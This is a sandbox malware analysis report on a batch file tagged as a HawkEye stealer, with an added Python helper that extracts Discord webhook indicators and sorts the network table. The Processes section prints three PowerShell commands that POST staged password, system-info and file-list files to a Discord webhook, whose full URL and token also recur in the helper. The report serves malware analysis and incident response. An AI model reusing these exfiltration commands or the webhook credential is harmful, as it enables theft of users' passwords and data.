Malware Analysis Report

2024-09-22 11:18

Sample ID 231113-z7k6gsfa5t
Target t.bat
SHA256 3a138a295230f132721473e396032bdd250158b6a1e45323cc520f5fe7985978
Tags
hawkeye keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a138a295230f132721473e396032bdd250158b6a1e45323cc520f5fe7985978

Threat Level: Known bad

The file t.bat was found to be: Known bad.

Malicious Activity Summary

hawkeye keylogger spyware stealer trojan

HawkEye

Blocklisted process makes network request

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Gathers system information

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2023-11-13 21:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-13 21:21

Reported

2023-11-13 21:23

Platform

win10v2004-20231020-en

Max time kernel

74s

Max time network

69s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\t.bat"

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Note: powershell.exe enables SeDebugPrivilege in its own token when it starts, so three hits for the three PowerShell launches below is expected host behaviour rather than evidence that t.bat itself manipulated tokens. The substantive finding is in the command lines under Processes.

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\t.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content passwords.txt)}"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content sysinfo.txt)}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content files.txt)}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 8.144.221.88.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 218.240.110.104.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 254.109.26.67.in-addr.arpa udp
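The Processes and Network sections together are the whole story of this sample: cmd.exe runs t.bat, which launches three powershell.exe instances that each POST a staged text file (passwords.txt, sysinfo.txt, files.txt) to one Discord webhook. The only network rows the command lines explain are the discord.com lookup and the 162.159.136.232:443 connections; the in-addr.arpa rows are reverse lookups issued by the guest, and nothing on the page ties the tse1.mm.bing.net traffic to the sample. The helper below is an added example, not part of the sandbox report or of the sample. It extracts the webhook id and token (the IOC a responder reports to Discord for takedown, and what you hunt for in proxy logs) and the staged file from each command line, then buckets the network rows by whether a command line accounts for them. The command lines and rows are copied from this page; the PID-to-command pairing follows the memory-dump names in the Files list and the PIDs for cmd.exe and systeminfo.exe are assumed.

```python
"""Triage helper for the Processes and Network sections of this report.

Added example, not part of the sandbox report or of the sample. Pulls Discord
webhook exfiltration indicators out of PowerShell command lines and sorts the
network rows by whether the sample's own commands explain them.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Discord webhook URL: the numeric id and the secret token are the IOC.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)",
    re.IGNORECASE,
)
# Invoke-WebRequest/Invoke-RestMethod POSTing a body read from a local file.
POST_FILE_RE = re.compile(
    r"-Method\s+POST\b.*?-Body\s+@\{.*?Get-Content\s+([^\s)]+)",
    re.IGNORECASE | re.DOTALL,
)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


@dataclass(frozen=True)
class WebhookExfil:
    pid: int
    webhook_id: str
    webhook_token: str
    staged_file: str  # local file whose contents are POSTed; "" if not found


def scan_commands(commands: Dict[int, str]) -> List[WebhookExfil]:
    """Flag every command line that POSTs a local file to a Discord webhook."""
    hits = []
    for pid, cmd in commands.items():
        hook = WEBHOOK_RE.search(cmd)
        if not hook:
            continue
        body = POST_FILE_RE.search(cmd)
        staged = body.group(1).strip("'\"") if body else ""
        hits.append(WebhookExfil(pid, hook.group(1), hook.group(2), staged))
    return hits


def command_hosts(commands: Dict[int, str]) -> Set[str]:
    """Hostnames of every URL that appears inside the command lines."""
    return {h.lower() for cmd in commands.values() for h in URL_HOST_RE.findall(cmd)}


def ptr_target(domain: str) -> str:
    """'232.136.159.162.in-addr.arpa' -> '162.159.136.232'."""
    octets = domain.lower().removesuffix(".in-addr.arpa").split(".")
    return ".".join(reversed(octets))


def classify_network(rows: List[str], hosts: Set[str]) -> Dict[str, List[str]]:
    """Bucket 'Country Destination Domain Proto' rows in the report's layout.

    exfil      - connection to a host named in a command line
    exfil_dns  - forward lookup of such a host
    ptr        - reverse lookup, annotated with the IP it maps to
    other      - nothing in the command lines accounts for it
    """
    parsed = [r.split() for r in rows]
    parsed = [p for p in parsed if len(p) == 4 and ":" in p[1]]  # drops header
    exfil_ips = {dest.rsplit(":", 1)[0] for _, dest, dom, _ in parsed
                 if dom.lower() in hosts and not dest.endswith(":53")}
    buckets: Dict[str, List[str]] = {"exfil": [], "exfil_dns": [], "ptr": [], "other": []}
    for country, dest, domain, proto in parsed:
        row = f"{country} {dest} {domain} {proto}"
        host = domain.lower()
        if host.endswith(".in-addr.arpa"):
            ip = ptr_target(host)
            tag = " (reverse lookup of exfil host)" if ip in exfil_ips else ""
            buckets["ptr"].append(f"{row} -> {ip}{tag}")
        elif host in hosts and dest.endswith(":53"):
            buckets["exfil_dns"].append(row)
        elif host in hosts:
            buckets["exfil"].append(row)
        else:
            buckets["other"].append(row)
    return buckets


# Command lines copied from the Processes section. PIDs 1040/3948/3916 follow the
# memory-dump names in the Files list; 1000 and 2000 are assumed placeholders.
WEBHOOK = ("https://discord.com/api/webhooks/1173685735228985494/"
           "03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_")
SAMPLE_COMMANDS = {
    1000: 'C:\\Windows\\system32\\cmd.exe /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\t.bat"',
    1040: f"powershell -Command \"Invoke-WebRequest -Uri '{WEBHOOK}' -Method POST -Body @{{content=(Get-Content passwords.txt)}}\"",
    2000: "systeminfo",
    3948: f"powershell -Command \"Invoke-WebRequest -Uri '{WEBHOOK}' -Method POST -Body @{{content=(Get-Content sysinfo.txt)}}\"",
    3916: f"powershell -Command \"Invoke-WebRequest -Uri '{WEBHOOK}' -Method POST -Body @{{content=(Get-Content files.txt)}}\"",
}

# Rows copied from the Network table; the header is included to show it is skipped.
SAMPLE_ROWS = [
    "Country Destination Domain Proto",
    "US 8.8.8.8:53 discord.com udp",
    "US 162.159.136.232:443 discord.com tcp",
    "US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp",
    "US 8.8.8.8:53 tse1.mm.bing.net udp",
    "US 204.79.197.200:443 tse1.mm.bing.net tcp",
    "US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp",
]

if __name__ == "__main__":
    for hit in scan_commands(SAMPLE_COMMANDS):
        print(f"pid {hit.pid}: POSTs {hit.staged_file} to webhook {hit.webhook_id}")
    for name, bucket in classify_network(SAMPLE_ROWS, command_hosts(SAMPLE_COMMANDS)).items():
        print(name, bucket)
```

Run against the page's rows, the script attributes only the discord.com lookup and the 162.159.136.232:443 connection to the sample, tags 232.136.159.162.in-addr.arpa as the reverse lookup of that exfil host, and leaves the bing.net rows as unexplained by anything t.bat ran. The regex accepts the ptb/canary subdomains and the older discordapp.com host as well, since the same webhook token works on all of them.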

Files

memory/1040-11-0x000002D359AE0000-0x000002D359B02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejj2rgeb.ncq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1040-16-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp

memory/1040-17-0x000002D341360000-0x000002D341370000-memory.dmp

memory/1040-18-0x000002D341360000-0x000002D341370000-memory.dmp

memory/1040-19-0x000002D341360000-0x000002D341370000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\passwords.txt

MD5 53b0ead48140091a196fafb6b8c5bb3c
SHA1 c6862512054f2de22087bfe539b9fa18e97db214
SHA256 57a3befee8f64369c40dfe1fb0b6df5792c8b68381e60d786b7432fb2a3cf662
SHA512 4f8e6514ea92ab08d950d2a00448f5f08f46d48112c632e0fcc504f7ea232b08f49db505751d949064df13a20a50e149034b78a17f45cd308fec1e472f7301cb

memory/1040-21-0x000002D35A740000-0x000002D35AEE6000-memory.dmp

memory/1040-25-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8a7f1bbb54d46317b10f8570930f1587
SHA1 a3622cd5ba47ff63381e1c8459dcdb822ae80b14
SHA256 19409fcc9d229fdc1fa59eb1b3beea2e031a76782261e3fdd0af6639f7111cac
SHA512 9c8c56c205ed32589c9ce80f10fe11986f238a722b3016e50e7677d60f190c7abe2fe445a9bdf2d192d8a9ab4f2e29528d5e179b2dca0c83668c3932858488c4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3d2dcde2b92ddc1caedbe3dcc9efc114
SHA1 e149ab0853f59539a6993d1727e7f29834c3a548
SHA256 3c598ecbf86eb6c3f992e35bbcd69e354cfb1f9caf0c436cd7acabac111d96c6
SHA512 662fd6ec00495373f8fbe821badaacf0c35e27243fd2d640e908ef913a0725f92f2379fc34d42653930463425cd8a290c8981cb658e155f10bc928ce84201ba4

memory/3948-38-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

memory/3948-40-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp

memory/3948-39-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

MD5 a9812d5ea5001324a17895f4ec2bb47c
SHA1 054e0b9eedcb1264ace23dbf239818244fdafb4f
SHA256 8907893d54ea7f5fea57bbca52fdde5d14b6517a0b8e745d78758667b469ae5e
SHA512 2677628779d1766bb84a736034cf8bbf0bd464adcadf41d1e94b5abfa0174aa7eb3a50d8a93748f7b55378df6ed13fed0cb2ea50d69736faeb146faf6f74c559

memory/3948-44-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

memory/3916-55-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

memory/3916-57-0x0000025177D90000-0x0000025177DA0000-memory.dmp

memory/3916-56-0x0000025177D90000-0x0000025177DA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 87addc59846b16b4a3c182e16ace9b84
SHA1 572ba04171b1f9d893f43f8c72800393b133161a
SHA256 abcdce53e9e05fd1009fa1a97af43f4471b3a408af5e51a1e5baa091a36ae5f0
SHA512 b5f2214bf9fe99cb9a6eda901b102bb46c9843a398d72154ff6943cec2d53defa9e7026002f80c29ea1ad0de5864aae91e8cb2b9a0426842d0d6299b87d2f18e

C:\Users\Admin\AppData\Local\Temp\files.txt

MD5 f31c3f34c03c7016c72b9355e02bceeb
SHA1 79ecb50628fef47b8b4518e624de4b241011da32
SHA256 ab9afd4963e85b01ab48cd37e7ebec4c3e496640a72976e5ec5529f5b92b1f8d
SHA512 abf53be628382272dbb0e75085e36ac1cc0d8c215ac4a27b2d1fe1e8647df03feaa60486a3068eae0d54c1d61256293536f59f335fe4ed55ce479aa5d9ddd679

memory/3916-62-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp